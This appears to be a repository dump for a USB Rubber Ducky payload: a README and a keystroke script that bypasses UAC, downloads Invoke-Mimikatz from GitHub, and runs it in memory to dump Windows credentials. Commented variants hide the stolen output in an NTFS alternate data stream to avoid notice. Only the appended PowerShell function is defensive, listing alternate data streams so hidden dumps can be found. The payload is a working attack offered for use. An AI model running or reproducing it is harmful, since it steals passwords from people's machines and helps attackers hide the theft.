```
├── Invoke-Mimikatz.ps1
├── README.md
└── mimi_mem.txt
```

/README.md:

# usb-rubber-ducky--mimikatz-in-mem

USB-Rubber-Ducky Payload - Mimikatz in Memory w UAC Bypass

This is a payload for the USB Rubber Ducky. It uses PowerShell to download and execute Mimikatz in memory.

For in-memory Mimikatz this uses PowerSploit's (Joe Bialek's) Invoke-Mimikatz.ps1. For the UAC bypass / admin prompt this uses Darren Kitchen's payload from here: https://forums.hak5.org/index.php?/topic/30100-payload-faster-uac-bypass/

| Feature | Status |
| ------ | ------ |
| Get Admin command prompt (required for Mimikatz) | COMPLETE |
| Download and execute Mimikatz in Memory | COMPLETE |
| Option to pipe output to a hidden data stream on disk | COMPLETE |
| Option to pipe output over network (GET requests?) | thinking about it... |

/mimi_mem.txt:

```text
REM **************************************************
REM Payload: Download and execute Mimikatz in memory
REM Target: Windows 7
REM Author: Charles Worrell
REM Based on UAC bypass by Darren Kitchen
REM Invoke-Mimikatz from PowerSploit by Joe Bialek
REM **************************************************
DELAY 1000
GUI r
DELAY 3000
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
REM Tried to combine with Start-Process above but it wasn't working. Will need to revisit...
STRING powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/binarycanary/usb-rubber-ducky--mimikatz-in-mem/master/Invoke-Mimikatz.ps1')"; Invoke-Mimikatz -DumpCreds
ENTER
STRING enjoy da passwerdz :)
REM **************************************************
REM Alternate piping of output
REM **************************************************
REM ** Pipe output to a file on desktop. Send it to an alternate data stream so it's not as easy to find :)
REM ** To open up the ADS: notepad %USERPROFILE%\Desktop\NewTextDocument.txt:hiddenADS.txt
REM ** If someone happens to open NewTextDocument.txt (notepad %USERPROFILE%\Desktop\NewTextDocument.txt) they won't see anything. Need streams to detect.
REM powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8000/Invoke-Mimikatz.ps1')"; Invoke-Mimikatz -DumpCreds > %USERPROFILE%\Desktop\NewTextDocument.txt:hiddenADS.txt 2>&1
REM *** Just dump output in command window
REM powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8000/Invoke-Mimikatz.ps1')"; Invoke-Mimikatz -DumpCreds
```
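The alternate-output variant above hides the Mimikatz dump in an NTFS alternate data stream, and the comment notes that Notepad shows nothing and a streams tool is needed to see it. As an added defensive example (not part of this repository), the following PowerShell enumerates every non-default stream under a directory and reports its size and first line, so an analyst can find such a hidden stream with built-in cmdlets alone; the default scan path and the `Zone.Identifier` allow-list are assumptions.

```powershell
# Added example: enumerate NTFS alternate data streams (ADS) under a directory.
# Not part of the usb-rubber-ducky--mimikatz-in-mem repository.
function Find-AlternateDataStreams {
    param(
        # Directory to scan; defaults to the user's Desktop (assumption: where the payload writes).
        [string]$Path = (Join-Path $env:USERPROFILE 'Desktop'),
        # Zone.Identifier is written by browsers for downloaded files and is normally benign.
        [string[]]$IgnoreStreams = @('Zone.Identifier')
    )

    Get-ChildItem -Path $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # '-Stream *' lists every stream on the file, including the default ':$DATA' stream.
            Get-Item -Path $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -notin $IgnoreStreams } |
                ForEach-Object {
                    # Read only the first line so the report stays small but still shows
                    # what kind of text was written into the stream.
                    $firstLine = Get-Content -Path $file.FullName -Stream $_.Stream `
                        -TotalCount 1 -ErrorAction SilentlyContinue
                    [pscustomobject]@{
                        File      = $file.FullName
                        Stream    = $_.Stream
                        Bytes     = $_.Length
                        FirstLine = $firstLine
                    }
                }
        }
}

# A hit such as NewTextDocument.txt with stream hiddenADS.txt is what the payload leaves behind.
Find-AlternateDataStreams | Format-Table -AutoSize
```

Run it from an elevated or the affected user's session; once a stream is confirmed malicious it can be removed with `Remove-Item -Path <file> -Stream <name>` without touching the host file.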